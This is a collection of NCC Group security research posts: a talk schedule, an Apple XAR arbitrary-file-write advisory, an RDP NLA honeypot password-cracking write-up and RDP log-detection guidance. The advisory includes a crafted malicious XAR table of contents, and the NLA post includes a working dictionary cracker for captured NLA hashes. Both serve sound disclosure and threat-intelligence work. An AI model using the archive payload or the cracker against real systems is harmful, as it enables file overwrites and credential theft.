[MSRC 2021] MSRC Team. “BadAlloc” – Memory allocation vulnerabilities could affect wide range of IoT and OT devices in industrial, medical, and enterprise networks. April 29, 2021. URL: https://msrcblog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-widerange-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/

[N2743] Robert C. Seacord. Volatile C++ Compatibility. May, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2743.pdf

[N2809] Robert C. Seacord. Annex K Repairs. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2809.pdf

[N2810] Robert C. Seacord. calloc wraparound handling. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2810.pdf

[N2836] Robert C. Seacord. Identifier Syntax using Unicode Standard Annex 31. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2836.pdf

[N2837] Robert C. Seacord. Clarifying integer terms v2. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2837.pdf

[P1152R4] JF Bastien. Deprecating volatile. 19 July 2019. URL: http://wg21.link/P1152R4

[RUS-CERT 2002] RUS-CERT Advisory. Flaw in calloc and similar routines 2002-08:02. URL:

[Weimer 2002] Florian Weimer. RUS-CERT Advisory 2002-08:02: Flaw in calloc and similar routines. August, 2002. URL: https://www.opennet.ru/base/cert/1028651886_905.txt.html


Conference Talks – November 2021

This month, members of NCC Group will be presenting their work at the following conferences:

• Jennifer Fernick & David Wheeler (Linux Foundation), “Keynote: Securing Open Source Software”, to be presented at The Linux Foundation Member Summit (November 2-4 2021)
• Brian Hong, “Sleight of ARM: Demystifying Intel Houdini”, to be presented at Ekoparty (November 2-6 2021)
• Sanne Maasakkers, “Phish like an APT: Phenomenal pretexting for persuasive phishing”, to be presented at Ekoparty (November 2-6 2021)
• Frans van Dorsselaer, “Symposium on Post-Quantum Cryptography: Act now, not later”, to be presented at the CWI Symposium on Post-Quantum Cryptography (November 3 2021)
• Pepjin Hack & Zong-Yu Wu, “We Wait, Because We Know You – Inside the Ransomware Negotiation Economics”, to be presented at Black Hat Europe 2021 (November 8-11 2021)
• Philip Marsden, “The 5G threat landscape”, to be presented at Control Systems Cybersecurity Europe 2021 (November 9-10 2021)
• Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia), “Dark Reading panel: Ransomware as the New Normal”, to be presented at Black Hat Europe (Business Hall) (November 10 2021)
• Alex Plaskett, “Pwning the Windows 10 Kernel with NTFS and WNF”, to be presented at Power of Community 2021 (November 11-12 2021)
• Tennisha Martin, “Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future”, to be presented at SANS Pentest HackFest (November 15-16 2021)
• Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (Nov 30 2021)

Keynote: Securing Open Source Software
Jennifer Fernick (NCC Group) & David Wheeler (Linux Foundation)
The Linux Foundation Member Summit
November 2-4 2021

Sleight of ARM: Demystifying Intel Houdini
Brian Hong

Ekoparty
November 2-6 2021

In recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.

In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Phish like an APT: Phenomenal pretexting for persuasive phishing
Sanne Maasakkers

Ekoparty
November 2-6 2021

Symposium on Post-Quantum Cryptography: Act now, not later
Frans van Dorsselaer

CWI Symposium on Post-Quantum Cryptography
November 3 2021

The Symposium on Post-Quantum Cryptography is part of a series organized by the CWI Cryptology Group and TNO. The first symposium in April 2021 was a general introduction to the problem from the perspective of industry, government, and end user. In this second episode we zoom in on a number of specific topics, including quantum-safe PKI, the relation between PQC and QKD, and PQC standards & implementation. The symposium is aimed at higher management and security professionals from government, private sector, and industry.

Cryptography is at the heart of internet security. However, much of the currently deployed cryptography is vulnerable to quantum attacks, which will become effective once large-scale quantum computers become feasible. Therefore, the affected cryptographic standards must be replaced by ones that offer security against quantum attacks. The post-quantum cryptography transition may take organizations ten years to complete, or longer. To remain secure and comply with legal and regulatory requirements, affected organizations should act now. What do you need to know – and what can you do – in order to continue your course of business securely?

“We Wait, Because We Know You” – Inside the Ransomware Negotiation Economics
Pepjin Hack & Zong-Yu Wu

Black Hat Europe 2021
November 8-11 2021

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is therefore now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. Little research has however focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods.

This session explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analyzed using both quantitative and qualitative methods.

Analysis of the final ransom agreement reveals that adversaries already know how much victims will pay, even before the negotiations have started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We however provide multiple strategies which can be used by victims to obtain a more favorable outcome. These strategies are taken from negotiation failures and successes derived from the cases we have analyzed and are accompanied by examples and quotes from actual conversations.

When ransomware hits a company, the company finds itself in the middle of an unfamiliar situation. One thing that makes such situations more manageable is having as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

The 5G threat landscape
Philip Marsden

Control Systems Cybersecurity Europe 2021
November 9-10 2021

While the move to 5G mobile deployments presents a wealth of opportunities and capabilities for us all, the technology also introduces new vulnerabilities and threats. There are three main threat vectors across the various 5G domains, and within these are sub-threats that describe additional points of vulnerability for threat actors to exploit. While not all-inclusive, these types of threats have the potential to increase risk to a particular mobile operator as it transitions to 5G. Policy and Standards, the Supply Chain, and finally the 5G systems architecture itself all have various vulnerabilities associated with them, and securing them is the foundation for securing the future 5G infrastructure. These threats could be cascaded by attackers to further leverage access to your 5G network and compromise hosts or endpoint user devices, be it an IoT device, a handset or a connected vehicle. This overview will attempt to show these threats and specific issues that might pose a risk to IoT/Control system devices and highlight how to mitigate these.

Dark Reading panel: Ransomware as the New Normal
Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia)

Black Hat Europe (Business Hall)
November 10 2021

It’s the same story, different victim, over and over: a hospital, school system, or business (think Colonial Pipeline) gets hit with a ransomware attack that locks down their servers, their operations, and in the case of healthcare organizations, places their patients at physical risk. Even with increased awareness, known best practices, and now governments like the US putting the squeeze on attackers and their cryptocurrency cover, there’s still no real end in sight to ransomware.

A panel of security experts will discuss and debate why ransomware attacks are so easy to pull off, why they’re so hard to stop – and what organizations need to do to double down on their defenses against one of these debilitating cyberattacks.

Pwning the Windows 10 Kernel with NTFS and WNF
Alex Plaskett

Power of Community 2021
November 11-12 2021

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).
With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted:

1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions.

Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future
Tennisha Martin

SANS Pentest HackFest
November 15-16 2021

Mentoring is often used to foster talent within an organization, pairing a junior employee with a more senior high performer. The mentee learns to mirror the behaviors of the mentor, which can be key to advancement. However, it can also lead to a subconscious bias, where employees end up hiring people just like them. This results in organizations that are homogeneous in their thoughts, viewpoints, backgrounds, ideas, perspectives, and approaches to problem solving. In a pen testing context, this leads to similar approaches to vulnerability discovery, testing, and results analysis. Pen testing is all about repeatable processes, and when you don’t change, you don’t learn anything or find anything new. Pen testers need a new approach to mentorship, one that recognizes the impact of a diversified workforce on business outcomes such as increasing innovation, diversifying skill sets, increasing motivation and engagement, and, critically, retaining high-potential talent. The Hacker’s Guide to Mentorship provides an outline of how to improve your bottom line by fixing your talent problem.

Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick

FS-ISAC
November 30 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:

• Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more
• Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
• Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption
• How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time
• Deciding when to begin integrating PQC in a world of competing technology standards
• Designing extensible cryptographic architectures
• Actions financial institutions’ cryptography teams can take immediately

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies.

NCC Group Research

Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)

Vendor: Apple
Vendor URL: https://www.apple.com/
Versions affected: xar 1.8-dev
Systems Affected: macOS versions below 12.0.1
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
CVE Identifier: CVE-2021-30833
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

XAR is a file archive format used in macOS, and is part of various file formats, including .xar, .pkg, .safariextz, and .xip files. XAR archives are extracted using the xar command-line utility. XAR was initially developed as an open source project; however, the original project appears to be no longer maintained. Apple maintains their own branch of XAR for macOS, which is published on the Apple Open Source website. The xar utility suffers from a logic vulnerability which allows files to be extracted outside of the intended destination folder, resulting in arbitrary file write anywhere on the filesystem (permissions allowing).

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

The XAR archive format supports archiving and extraction of symlinks for both files and directories. When extracting an archive which contains both a directory symlink and a file within a directory named the same as the directory symlink, xar will overwrite the directory symlink with a real directory. This protects against maliciously crafted archives where a symlink directory is unarchived and a file is unarchived into it. An example of the Table of Contents (ToC) for a .xar file in this scenario is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
<toc>
<checksum style="sha1">
<offset>0</offset>
<size>20</size>
</checksum>
<file id="1">
<name>xx</name>
</file>
<file id="2">
<type>directory</type>
<name>x</name>
<file id="3">
<data>
<length>6</length>
<encoding style="application/octet-stream"/>
<offset>20</offset>
<size>6</size>
<extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
<archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
</data>
<type>file</type>
<name>foo</name>
</file>
</file>
</toc>
</xar>

As shown below, this results in the directory “x” being created in the current directory, and the file foo being written within it, rather than to the /tmp/ directory – which was the target of the directory symlink:

However, xar allows for a forward-slash separated path to be specified in the file name property, e.g. <name>x/foo</name> – as long as it doesn’t traverse upwards, and the path exists within the current directory. This means an attacker can create a .xar file which contains both a directory symlink, and a file with a name property which points into the extracted symlink directory. By abusing symlink directories in this manner, an attacker can write arbitrary files to any directory on the filesystem – providing the user has permissions to write to it. An example of the ToC for a malicious .xar file which exploits this vulnerability is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
<toc>
<checksum style="sha1">
<offset>0</offset>
<size>20</size>
</checksum>
<file id="1">
<name>.x</name>
</file>
<file id="2">
<data>
<length>6</length>
<encoding style="application/octet-stream"/>
<offset>20</offset>
<size>6</size>
<extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
<archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
</data>
<type>file</type>
<name>.x/test</name>
</file>
</toc>
</xar>
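
As a rough illustration of how such an archive could be spotted before extraction, the following Python sketch parses a ToC and reports every name property that contains a forward slash. The function name suspicious_names and the shortened sample ToC are assumptions made for this example; this is not part of xar or of Apple's fix, and a name containing a slash is only an indicator worth reviewing, not proof of exploitation.

```python
import xml.etree.ElementTree as ET

# Shortened sample ToC modelled on the malicious example above (illustrative only).
MALICIOUS_TOC = """<xar>
<toc>
<file id="1">
<name>.x</name>
</file>
<file id="2">
<type>file</type>
<name>.x/test</name>
</file>
</toc>
</xar>"""


def suspicious_names(toc_xml: str) -> list:
    """Return every <name> value in the ToC that contains a path separator."""
    root = ET.fromstring(toc_xml)
    return [
        name.text
        for name in root.iter("name")
        if name.text and "/" in name.text
    ]


if __name__ == "__main__":
    for entry in suspicious_names(MALICIOUS_TOC):
        print("name contains a path separator:", entry)
```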

The following screenshot shows successful exploitation of this vulnerability to write a file into the /tmp/ directory using a directory symlink:

Recommendation

Update to macOS 12.0.1 or above.

Vendor Communication

2021-06-04 - Reported to Apple Product Security.
2021-06-08 - Apple advise they are investigating the report and require more than 30 days.
2021-06-24 - Apple confirm they are able to reproduce the vulnerability and are working to address in a future major macOS update.
2021-08-17 - We request an estimated date for a fix from Apple.
2021-08-19 - Apple advise they are still working on addressing the issue. Request that we hold off any disclosure.
2021-10-25 - macOS 12.0.1 released, which addresses the reported vulnerability.
2021-10-28 - Advisory published.

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published Date: 2021-10-28

Written By: Richard Warren

NCC Group Research

Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment

During the summer of 2021, WhatsApp engaged NCC Group’s Cryptography Services team to conduct an independent security assessment of its End-to-End Encrypted Backups project. End-to-End Encrypted Backups is a hardware security module (HSM) based key vault solution that primarily aims to support encrypted backup of WhatsApp user data. This assessment was performed remotely, as a 35 person-day effort by three NCC Group consultants over the course of five weeks. NCC Group and the WhatsApp team scheduled the retesting of findings and the preparation of this public report a few weeks later, following the delivery of the initial security assessment.

NCC Group Research

Cracking RDP NLA Supplied Credentials for Threat Intelligence

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which include the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

1. Capture a legitimate NLA connection.
2. Parse and extract the key fields from the packets.
3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we identified six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

1. Negotiate In
2. Negotiate Out
3. Challenge In
4. Challenge Out
5. Authenticate In
6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.
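
To illustrate the naming scheme, the sketch below groups dumped files by their session prefix so that all messages from one connection can be processed together. It assumes the files follow the XXXXX.MessageName pattern described above; the function name group_by_session is hypothetical and is not taken from the published code.

```python
from collections import defaultdict

# The six message names listed above, used as file extensions.
MESSAGE_TYPES = (
    "NegotiateIn", "NegotiateOut",
    "ChallengeIn", "ChallengeOut",
    "AuthenticateIn", "AuthenticateOut",
)


def group_by_session(filenames):
    """Map each session ID to a {message type: filename} dictionary."""
    sessions = defaultdict(dict)
    for name in filenames:
        session_id, _, message_type = name.partition(".")
        # Ignore anything that does not look like a dumped NLA message.
        if session_id.isdigit() and message_type in MESSAGE_TYPES:
            sessions[session_id][message_type] = name
    return dict(sessions)


if __name__ == "__main__":
    dumped = ["12345.NegotiateIn", "12345.ChallengeOut", "777.NegotiateIn"]
    for session_id, messages in group_by_session(dumped).items():
        print(session_id, sorted(messages))
```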

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authenticate In” message from the client. At that point, it takes all the previous messages, performs some calculations on them, and compares the result with the “MIC” stored in the “Authenticate In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
# NtHash is the MD4 digest of the password
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!
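
The dictionary attack can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not the code from the nlahoney repository: the session dictionary and its keys (user, domain, server_challenge, timestamp, client_challenge, target_info, encrypted_random_session_key, messages, mic) are hypothetical names for the already-parsed fields, "messages" stands for the concatenated msg bytes from the pseudocode, and the user name is uppercased as the NTLMv2 specification (MS-NLMP) requires, a detail the rough pseudocode omits. MD4 and RC4 are implemented inline because many modern Python builds no longer expose MD4 through hashlib.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
ROUND3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64)
    padded += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for offset in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[offset:offset + 64])
        a, b, c, d = state
        for i in range(48):
            if i < 16:      # round 1
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:    # round 2
                f, k = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4
                s, add = (3, 5, 9, 13)[i % 4], 0x5A827999
            else:           # round 3
                f, k = b ^ c ^ d, ROUND3_ORDER[i - 32]
                s, add = (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            t = (a + f + x[k] + add) & MASK
            a, b, c, d = d, ((t << s) | (t >> (32 - s))) & MASK, b, c
        state = [(v + w) & MASK for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def compute_mic(password: str, session: dict) -> bytes:
    """Follow the pseudocode above for one candidate password."""
    nt_hash = md4(password.encode("utf-16-le"))
    identity = (session["user"].upper() + session["domain"]).encode("utf-16-le")
    ntlm_v2_hash = hmac_md5(nt_hash, identity)
    temp_chal = (session["server_challenge"] + b"\x01\x01" + b"\x00" * 6
                 + session["timestamp"] + session["client_challenge"]
                 + b"\x00" * 4 + session["target_info"])
    nt_proof = hmac_md5(ntlm_v2_hash, temp_chal)
    key_exchange_key = hmac_md5(ntlm_v2_hash, nt_proof)
    encrypted = session.get("encrypted_random_session_key")
    exported = rc4(key_exchange_key, encrypted) if encrypted else key_exchange_key
    return hmac_md5(exported, session["messages"])


def crack(session: dict, wordlist):
    """Return the first candidate whose MIC matches the captured one, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(compute_mic(candidate, session), session["mic"]):
            return candidate
    return None
```

Calling crack(session, wordlist) with a parsed session and an iterable of candidate passwords returns the matching password, or None if the list is exhausted. A pure-Python loop like this is slow, which is one reason a dedicated cracking tool is the natural next step.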

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project has been open sourced at https://github.com/nccgroup/nlahoney, along with all our supporting research notes.

Future

The next logical step would be to rewrite the Python password cracker as a hashcat module, which is left as an exercise for the reader.

NCC Group Research

Overview

Remote Desktop Protocol (RDP) lets users of Microsoft Windows systems open a remote desktop session to manage one or more workstations and/or servers. With more organizations opting for remote work, RDP usage over the internet has increased too. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389, making it very easy for criminal threat actors to discover. Furthermore, the default authentication method is limited to only a username and password.

The dangers of exposing RDP, and similar solutions such as TeamViewer (port 5938) and VNC (port 5900), are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.”

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE-2019-0708), first reported in May 2019, was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7. Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of the authentication mechanisms for RDP significantly increase the risk to organizations with RDP instances exposed to the internet. By default, RDP does not have built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

RDP use is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, which makes securing RDP even more challenging.

RDP Access in the logs

RDP logons or attacks generate several log events in several event logs. These events are found on the target systems where RDP sessions were attempted or completed, or in the Active Directory that handled the authentication. These events need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior. There are also events on the source system that can be collected, but we will save that for another blog.

Given that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations where malicious behavior is suspected, the more logs, the better.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are not likely to impact log management volume or licensing. This is especially true because RDP logs are only found on the target system, and RDP is seldom used for workstations.

Generally, the more low-noise, low-volume, high-validity events you can collect from all endpoints into a log management solution, the better your detection of malicious activity can be. An organization will need to test and decide which events to ingest based on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

• Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used. These events contain a lot of detail about all authentication to a system, so expect a high volume of events:

• Event Log = Security
• Event ID = 4624 (success)
• Event ID = 4625 (failed)
• Logon Type = 10 (RDP)
• Account Name = The user name logging on
• Workstation Name = The name of the system the logon originated from
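
As a rough sketch of this query logic, the Python below filters already-exported event records and counts failed RDP logons per account. The record layout (dictionaries with EventLog, EventID, LogonType and AccountName keys) is an assumption made for this example; real field names depend on how your log management or SIEM solution exports Windows events.

```python
from collections import Counter


def rdp_logon_events(events):
    """Keep Security events 4624/4625 whose Logon Type is 10 (RDP)."""
    return [
        e for e in events
        if e.get("EventLog") == "Security"
        and e.get("EventID") in (4624, 4625)
        and e.get("LogonType") == 10
    ]


def failed_logons_by_account(events):
    """Count failed RDP logons (4625) per account name."""
    return Counter(
        e["AccountName"] for e in rdp_logon_events(events) if e["EventID"] == 4625
    )


if __name__ == "__main__":
    sample = [
        {"EventLog": "Security", "EventID": 4625, "LogonType": 10, "AccountName": "admin"},
        {"EventLog": "Security", "EventID": 4624, "LogonType": 2, "AccountName": "alice"},
    ]
    print(failed_logons_by_account(sample))
```

A sudden rise in the failed count for one account is a simple indicator of brute forcing that can be turned into an alert.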

Optionally, another logon audit policy can be enabled to collect RDP events, but this will also generate a lot of other logon noise. The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

• Logon/Logoff – Other Logon/Logoff Events = Success and Failure

The following query logic can be used. These events contain a few details about session authentication to a system, so expect a low volume of events:

• Event Log = Security
• Event ID = 4778 (connect)
• Event ID = 4779 (disconnect)
• Account Name = The user name connecting or disconnecting
• Session Name = RDP-Tcp#3
• Client Name = This will be the system name of the source system making the RDP connection
• Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that record valuable events, which can be investigated during an incident to determine the source of the RDP login. Fortunately, these events are on by default, so the Windows Advanced Audit Policy does not need to be updated to collect them.

The following query logic can be used. These events contain a few details about RDP connections to a system, so expect a low volume of events:

• Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
• Event ID = 21 (RDP connect)
• Event ID = 24 (RDP disconnect)
• User = The user that made the RDP connection
• Source Network Address = The system where the RDP connection originated
• Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, Event ID 24 (disconnect) is created when the user disconnects, after the log has been cleared. This allows tracing of the path that the user and/or threat actor took from system to system.
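
One way to use this during an investigation is to pair each connect event with the following disconnect for the same user and source address. The sketch below is an illustration only: the record keys (event_id, time, user, source) and the function name trace_sessions are assumptions, and timestamps are assumed to be ISO 8601 strings so that they sort correctly as text.

```python
def trace_sessions(events):
    """Pair Event ID 21 (connect) with the next Event ID 24 (disconnect)."""
    open_sessions = {}
    sessions = []
    for e in sorted(events, key=lambda e: e["time"]):
        key = (e["user"], e["source"])
        if e["event_id"] == 21:
            open_sessions[key] = e["time"]
        elif e["event_id"] == 24:
            sessions.append({
                "user": e["user"],
                "source": e["source"],
                # None means no connect event survived, e.g. the log was cleared.
                "connected": open_sessions.pop(key, None),
                "disconnected": e["time"],
            })
    return sessions


if __name__ == "__main__":
    sample = [
        {"event_id": 24, "time": "2021-10-01T09:30:00", "user": "alice", "source": "10.0.0.5"},
        {"event_id": 21, "time": "2021-10-01T09:00:00", "user": "alice", "source": "10.0.0.5"},
    ]
    for session in trace_sessions(sample):
        print(session)
```

A disconnect with no matching connect is worth a closer look, since it is consistent with the log having been cleared mid-session.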

